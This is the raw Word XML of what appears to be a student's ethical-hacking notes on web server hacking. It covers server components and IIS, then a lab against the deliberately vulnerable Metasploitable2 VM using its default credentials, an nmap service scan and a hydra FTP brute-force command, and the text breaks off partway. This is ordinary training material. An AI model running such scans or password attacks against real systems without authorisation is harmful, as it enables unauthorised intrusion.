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6DC45" w14:textId="77777777" w:rsidR="00DB7F69" w:rsidRDefault="00DB7F69">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2C120A" w14:textId="1C22F17C" w:rsidR="0058064B" w:rsidRDefault="0058064B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058064B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Module 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234DFCC5" w14:textId="654B7DB8" w:rsidR="0058064B" w:rsidRDefault="00DB7F6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</w:t>
      </w:r>
      <w:r w:rsidR="0058064B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hacking Web Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71918A76" w14:textId="23498384" w:rsidR="0058064B" w:rsidRDefault="0058064B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="254B9AB9" w14:textId="4ABB5314" w:rsidR="0043309C" w:rsidRDefault="0043309C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 webserver is hardware or software that stores, process, and deliver web page via HTTP protocol</w:t>
      </w:r>
      <w:r w:rsidR="00D03977">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. When a user request video or photo from </w:t>
      </w:r>
      <w:r w:rsidR="001A1293">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00D03977">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">search engine actually he </w:t>
      </w:r>
      <w:r w:rsidR="001A1293">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>becomes</w:t>
      </w:r>
      <w:r w:rsidR="00D03977">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the client and his browser </w:t>
      </w:r>
      <w:r w:rsidR="001A1293">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>generates</w:t>
      </w:r>
      <w:r w:rsidR="00D03977">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP request that is sent to the web server than web server collect the request </w:t>
      </w:r>
      <w:r w:rsidR="008B2E01">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from the data storage or application web server and respond the client request with appropriate HTTP response</w:t>
      </w:r>
      <w:r w:rsidR="00194BAF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA546BA" w14:textId="7597083C" w:rsidR="00194BAF" w:rsidRDefault="00194BAF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E23EE9E" w14:textId="0CAE3F7E" w:rsidR="00194BAF" w:rsidRDefault="00124C83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D669F3" wp14:editId="4CDC16BB">
            <wp:extent cx="5731510" cy="3383280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="Web Server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 Servers - Javatpoi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843E" w14:textId="41CBEC3B" w:rsidR="00540A5D" w:rsidRDefault="00540A5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473265A1" w14:textId="26314D29" w:rsidR="00540A5D" w:rsidRPr="00EB14B6" w:rsidRDefault="001259DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB14B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Component of web server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C69DBC9" w14:textId="69A8DD1C" w:rsidR="001259DB" w:rsidRPr="007A44F1" w:rsidRDefault="001259DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A44F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Document root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B46A626" w14:textId="3021C075" w:rsidR="001259DB" w:rsidRDefault="001259D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It is </w:t>
      </w:r>
      <w:r w:rsidR="001A1293">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directory of web server in which root file of directory are there and into them critical HTML file are stored related to the web page of domain name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A5C512" w14:textId="6B9384F4" w:rsidR="001259DB" w:rsidRPr="007A44F1" w:rsidRDefault="001259DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A44F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15607DCE" w14:textId="1583B5EC" w:rsidR="001259DB" w:rsidRDefault="001259D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It is also a directory but </w:t>
      </w:r>
      <w:r w:rsidR="00AF193A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">it is </w:t>
      </w:r>
      <w:r w:rsidR="0099591B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>top-level</w:t>
      </w:r>
      <w:r w:rsidR="00AF193A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory in which server configuration and </w:t>
      </w:r>
      <w:r w:rsidR="00807073">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidR="00AF193A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, executable and log file are stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ACE614" w14:textId="7203563E" w:rsidR="00AF193A" w:rsidRDefault="00AF193A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05108595" w14:textId="1F3531BD" w:rsidR="00AF193A" w:rsidRPr="007A44F1" w:rsidRDefault="00AF193A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A44F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Virtual Document Tree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C1F3CE" w14:textId="2F49CA72" w:rsidR="00AF193A" w:rsidRDefault="00AF193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It provide additional storage on different machine or disk after the original space become full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE832D5" w14:textId="32F2F0CB" w:rsidR="00646799" w:rsidRDefault="00646799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D0C664D" w14:textId="3A2D3955" w:rsidR="00646799" w:rsidRPr="007A44F1" w:rsidRDefault="00646799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A44F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual Hosting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FD3A2F" w14:textId="4147405D" w:rsidR="00646799" w:rsidRDefault="00646799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It is a technique of hosting a multiple domain or website in same server . This technique allows the sharing of resource among various server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657CF7A4" w14:textId="06352FD7" w:rsidR="00510FB5" w:rsidRDefault="00510FB5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4178F5BD" w14:textId="19E10D97" w:rsidR="00510FB5" w:rsidRPr="007A44F1" w:rsidRDefault="00510FB5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A44F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCAB368" w14:textId="69D31F76" w:rsidR="00510FB5" w:rsidRDefault="007A44F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A proxy server is located between the web client and web server. This </w:t>
      </w:r>
      <w:r w:rsidR="00735715">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to prevent from IP blocking and maintaining anonymity.</w:t>
      </w:r>
      <w:r w:rsidR="001A1293">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B25EF20" w14:textId="39537AF0" w:rsidR="007A44F1" w:rsidRDefault="007A44F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52A01AA2" w14:textId="30F35DFB" w:rsidR="007A44F1" w:rsidRDefault="000C292A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C292A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IIS Web Server Architecture </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03692E1E" w14:textId="030D80DD" w:rsidR="000C292A" w:rsidRDefault="000C292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Internet Information Service is a web server application which is flexible for hosting anything on the web like HTTP, HTTP secure (HTTPS), FTP(file transfer protocol), FTPS (FTP secure), SMTP (simple mail transfer protocol).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38153DC1" w14:textId="3077FD4E" w:rsidR="000C292A" w:rsidRDefault="000C292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It also has several component like http listener and service like WWW</w:t>
      </w:r>
      <w:r w:rsidR="00D55054">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Publishing Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063D5369" w14:textId="79B58DDA" w:rsidR="00757921" w:rsidRDefault="00757921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="450FD291" w14:textId="58F524FF" w:rsidR="00757921" w:rsidRPr="00EB14B6" w:rsidRDefault="00757921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB14B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Common Goal Behind web server hacking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F992AFE" w14:textId="06C0E536" w:rsidR="00757921" w:rsidRDefault="0075792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Stealing credential detail or sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3125F906" w14:textId="4B55CC87" w:rsidR="00757921" w:rsidRDefault="0075792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Compromising the Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF0616" w14:textId="77777777" w:rsidR="00757921" w:rsidRDefault="0075792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Escalating privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB092E2" w14:textId="1291A01B" w:rsidR="00757921" w:rsidRDefault="0075792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Obtaining Source code of application </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35943082" w14:textId="2786F5C3" w:rsidR="00757921" w:rsidRDefault="0075792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7757B570" w14:textId="32A3D1C8" w:rsidR="00215FE5" w:rsidRDefault="00215FE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Foot printing the webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B3B12F" w14:textId="5470F15E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We had  seen most tool of foot printing in beginning module like </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE89558" w14:textId="061BE63F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Whois </w:t>
      </w:r>
      <w:r w:rsidR="001A1293">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lookup</w:t>
      </w:r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7BF58B90" w14:textId="348A6DBF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DNS lookup </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA11A52" w14:textId="20390E2A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http recon </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E12A3D" w14:textId="6BD350EA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nmap etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D408B6" w14:textId="755EF093" w:rsidR="00215FE5" w:rsidRDefault="00215FE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56403C06" w14:textId="0E2B378A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Lets see foot printing of webserver with nmap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFE562B" w14:textId="7A3C6976" w:rsidR="00215FE5" w:rsidRDefault="00215FE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA6DCC2" w14:textId="7A87ED91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First we need a webserver </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB1C27F" w14:textId="0574ED0B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Download metasploitable2 machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B67EE8" w14:textId="1ABFAA12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Source :- </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00765184">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/metasploitable-2,29/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53B601FB" w14:textId="0F524BAC" w:rsidR="00215FE5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Install it on VMware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A00BFF0" w14:textId="77777777" w:rsidR="00E672B1" w:rsidRDefault="00215FE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Launch it, default credential is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A19F537" w14:textId="77777777" w:rsidR="00E672B1" w:rsidRPr="00E672B1" w:rsidRDefault="00215FE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E672B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">username = </w:t>
      </w:r>
      <w:r w:rsidR="00E672B1" w:rsidRPr="00E672B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00E672B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:r w:rsidR="00E672B1" w:rsidRPr="00E672B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632DB24A" w14:textId="70E0F813" w:rsidR="00215FE5" w:rsidRDefault="00E672B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E672B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password =</w:t>
      </w:r>
      <w:r w:rsidR="00215FE5" w:rsidRPr="00E672B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E672B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00215FE5" w:rsidRPr="00E672B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E672B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0199DA7B" w14:textId="24509DFD" w:rsidR="00E672B1" w:rsidRDefault="00E672B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Run ifconfig we get IP, search this IP we get webpage with different module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C9B66C" w14:textId="6B4EF9B3" w:rsidR="00C01F9E" w:rsidRDefault="00C01F9E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3B037C" wp14:editId="68060570">
            <wp:extent cx="5731119" cy="3750197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02" cy="375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E4B7" w14:textId="30FCF60C" w:rsidR="00E672B1" w:rsidRDefault="00E672B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Lets run nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E4A07F" w14:textId="39033EDD" w:rsidR="00E672B1" w:rsidRDefault="00E672B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Command :- </w:t>
      </w:r>
      <w:r w:rsidRPr="00E672B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -sV [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8F8372" w14:textId="4A0B79E5" w:rsidR="00C01F9E" w:rsidRDefault="00B06AF9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97D233" wp14:editId="254F8A51">
            <wp:extent cx="5730353" cy="333929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5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6FEE" w14:textId="52AA97DD" w:rsidR="00B06AF9" w:rsidRDefault="00B06AF9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We can see all services running on metasploitable2 machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A010738" w14:textId="0A061DB3" w:rsidR="00182604" w:rsidRDefault="00182604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First let check user and password of ftp server by bruteforce attack with the help of </w:t>
      </w:r>
      <w:r w:rsidRPr="008D427C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HYDRA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AE1D71" w14:textId="59657FF5" w:rsidR="00182604" w:rsidRDefault="00182604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Command:- </w:t>
      </w:r>
      <w:r w:rsidRPr="00182604">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hydra -L (user_list) -P (pass_list) [IP] [service]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EAB0D9" w14:textId="7E90CDF3" w:rsidR="00182604" w:rsidRDefault="00182604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5EF6B5" wp14:editId="4EF7F7F2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E5BB" w14:textId="472405B9" w:rsidR="006847E7" w:rsidRDefault="006847E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This is ftp valid user </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74040BB2" w14:textId="16B48829" w:rsidR="006847E7" w:rsidRDefault="006847E7">
      <w:pPr>
